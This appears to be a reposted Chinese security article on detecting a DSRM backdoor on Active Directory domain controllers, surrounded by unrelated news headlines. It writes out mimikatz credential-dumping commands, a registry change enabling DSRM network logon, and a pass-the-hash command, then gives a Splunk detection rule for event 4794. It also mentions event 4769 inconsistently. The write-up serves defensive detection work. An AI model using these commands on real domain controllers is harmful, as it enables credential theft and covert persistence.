当前位置: 首页>资讯 >

当前滚动:基于AD Event日志实时检测DSRM后门

来源: 程序员客栈 | 时间: 2023-01-11 08:11:13 |

01、简介

每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。


(资料图片)

域内权限维持的方式有很多,每增加一条安全检测规则,就多一层安全保障。针对DSRM后门,基于AD Event日志能够帮助我们提供什么维度的检测,我们通过一个后门利用实例来看一下。

02、利用方式

(1)获取域内用户Hash

使用mimikatz查看域内用户test的NTLM Hash。

mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test

(2)将DSRM帐户和域用户的NTLM Hash同步

使用DSRM的密码和指定域用户test的密码进行同步,在命令行环境中使用ntdsutil工具重置DSRM管理员密码。

(3)抓取DSRM密码

因同步域内用户test的NTLM Hash,可以发现,DSRM Hash 和域用户test的NTLM Hash一致。

mimikatz#privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam

(4)修改DSRM登录方式

DSRM 有三种登录方式,具体如下:

0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器

如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。

修改注册表:

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2

(5)使用DSRM远程登录

在域成员服务器上使用DSRM进行远程登录,注意domain使用域控的主机名。

mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040

03、攻击检测

当攻击者尝试重置DSRM管理员密码或是指定域内用户NTLM Hash同步时,都会生成4769事件,因此可以实时监控4794事件,一旦攻击者尝试修改DSRM密码就会触发告警。

4794事件:每次更改目录还原模式(DSRM)管理员密码时,就会生成此事件,包含SID和帐户名,以及调用方工作站。

安全规则:

index=ad  EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time  by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,域控服务器:"+dest +" 疑似DSRM域后门行为,试图设置目录服务还原模式管理员密码"+count+"次,操作账号:"+user| table start_time end_time user message

安全告警效果如下图:

关键词: 管理员密码 远程登录 安全检测

 

热文推荐

当前滚动:基于AD Event日志实时检测DSRM后门

01、简介每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator

2023-01-11

民和股份:未来一段时间鸡苗缺口已形成 预计后期鸡苗价格会有较好走势|热推荐

民和股份1月10日在互动平台表示,当前公司主要产品均正常销售;由于前期祖代鸡引种相对较少,所以未来一段时间鸡苗缺口已经形成,预计后期鸡苗

2023-01-10

大宗交易:机构账户卖出中伟股份9853.38万元(01-10)

2023年1月10日,中伟股份发生1笔大宗交易,总成交142万股,成交金额9853 38万元,成交价69 39元,折价1 50%。

2023-01-10

奥尼电子:公司智能行车记录仪包括4G行车记录仪、多录行车记录仪、专车专用行车记录仪等产品|世界热门

每经AI快讯,有投资者在投资者互动平台提问:请问贵公司生产的产品中,有行车记录仪么?或者说是否有产品可用于车内监控,踏板处视频监控(网上

2023-01-10

俊知集团(01300.HK)发布公告,自2023年1月9日起,夏镔已辞任非执行董事;及张冬杰已获委任为非执行董事_世界聚焦

俊知集团(01300 HK)发布公告,自2023年1月9日起,夏镔已辞任非执行董事;及张冬杰已获委任为非执行董事。

2023-01-10

异动快报:黑芝麻(000716)1月10日9点34分触及涨停板

1月10日盘中消息,9点34分黑芝麻(000716)触及涨停板。目前价格9 74,上涨10 06%。其所属行业休闲食品目前下跌。领涨股为黑芝麻。该股为植物

2023-01-10

17岁的小孩抚养费标准是多少

1、离婚孩子抚养费标准是:子女抚育费的数额,可根据子女的实际需要、父母双方的负担能力和当地的实际生活水平确定。有固定收入的,抚育费一般

2023-01-10

三沙市六级工伤赔偿标准

职工因工致残被鉴定为五级、六级伤残的,享受以下待遇:(一)从工伤保险基金按伤残等级支付一次性伤残补助金,标准为:五级伤残为18个月的本

2023-01-10

世界热消息:贷款逾期五个月多了征信会有影响吗

网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可

2023-01-10

这里的上涨不见得是好事!

一、从时空点看,今天大盘收出,在消息面影响下高开后的小阳线,短线走出了六连阳的走势,收复了12 19的长阴线,短线看上去比较强势,但这样的

2023-01-09

环球聚焦:2023年招商证券第三届招财杯私募公开赛战火重燃,报名火热开启中

2023年招商证券第三届招财杯私募公开赛战火重燃,报名火热开启中

2023-01-09

葛兰素史克(GSK.US)和CureVac(CVAC.US)计划推进新冠肺炎和季节性流感的mRNA疫苗研发_环球要闻

葛兰素史克(GSK US)和CureVac(CVAC US)在取得有积极的早期结果后,正计划对新冠肺炎和季节性流感的mRNA疫苗进行进一步的临床测试,尽管在扩大

2023-01-09

全球观热点:在df的一列中 有None和Nan 我想把这些空值都填充为-1 应该怎么操作呢

点击上方“Python共享之家”,进行关注回复“资源”即可获赠Python学习资料今日鸡汤城上高楼接大荒,海天愁思正茫茫。大家好,我是皮皮。一、

2023-01-07

港股异动 | 协鑫科技(03800)现涨超5% 保利协鑫与阿特斯合资成立1.2GW光伏电池厂

协鑫科技(03800)现涨超5%,截至发稿,涨5 03%,报2 09港元,成交额7 24亿港元。

2023-01-06

漫步者(002351):独立董事聘任高级管理人员的独立意见

2023年01月07日公告发布

2023-01-06

环球热资讯!集邦咨询:预估一季度NAND Flash均价跌幅收敛至10%-15%

1月6日,据TrendForce集邦咨询研究显示,由于多数供应商已开始减产,2023年第一季NANDFlash价格季跌幅将收敛至10%-15%,削价竞争也在原厂启动

2023-01-06

物业被指带不明人员上门打伤业主,当事人:我老婆被踹倒,当场昏厥,物业:曾因车位问题发生纠纷_环球信息

1月6日,据九派新闻视频报道,1月5日,江西南昌某小区物业经理被指带不明人员到业主家,与业主发生冲突,并打伤业主,引起广泛关注。视频内容

2023-01-06

今亮点!苏州工业园区新冠康养门诊在哪里?

苏州工业园区新冠康养门诊:苏州九龙医院中医新冠康养调理门诊地址:九龙医院门诊二楼中医科服务时间:周一到周日8:00-11:30,13-16:30咨询电话:626

2023-01-06

每日视讯:歌尔股份等41股近五日获机构净买入

证券时报网讯,近五个交易日的龙虎榜当中,77只个股出现了机构的身影,其中41只股票呈现机构净买入,36只股票呈现机构净卖出。近五日机构净买

2023-01-06

全球播报:炜冈科技:公司不生产预制菜

每经AI快讯,有投资者在投资者互动平台提问:公司生产预制菜吗?炜冈科技(001256 SZ)1月5日在投资者互动平台表示,公司专注从事标签印刷设备的

2023-01-05

资讯

当前滚动:基于AD Event日志实时检测DSRM后门

01、简介每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator

2023-01-11     
民和股份:未来一段时间鸡苗缺口已形成 预计后期鸡苗价格会有较好走势|热推荐

民和股份1月10日在互动平台表示,当前公司主要产品均正常销售;由于前期祖代鸡引种相对较少,所以未来一段时间鸡苗缺口已经形成,预计后期鸡苗

2023-01-10     
大宗交易:机构账户卖出中伟股份9853.38万元(01-10)

2023年1月10日,中伟股份发生1笔大宗交易,总成交142万股,成交金额9853 38万元,成交价69 39元,折价1 50%。

2023-01-10     
奥尼电子:公司智能行车记录仪包括4G行车记录仪、多录行车记录仪、专车专用行车记录仪等产品|世界热门

每经AI快讯,有投资者在投资者互动平台提问:请问贵公司生产的产品中,有行车记录仪么?或者说是否有产品可用于车内监控,踏板处视频监控(网上

2023-01-10     
俊知集团(01300.HK)发布公告,自2023年1月9日起,夏镔已辞任非执行董事;及张冬杰已获委任为非执行董事_世界聚焦

俊知集团(01300 HK)发布公告,自2023年1月9日起,夏镔已辞任非执行董事;及张冬杰已获委任为非执行董事。

2023-01-10     
异动快报:黑芝麻(000716)1月10日9点34分触及涨停板

1月10日盘中消息,9点34分黑芝麻(000716)触及涨停板。目前价格9 74,上涨10 06%。其所属行业休闲食品目前下跌。领涨股为黑芝麻。该股为植物

2023-01-10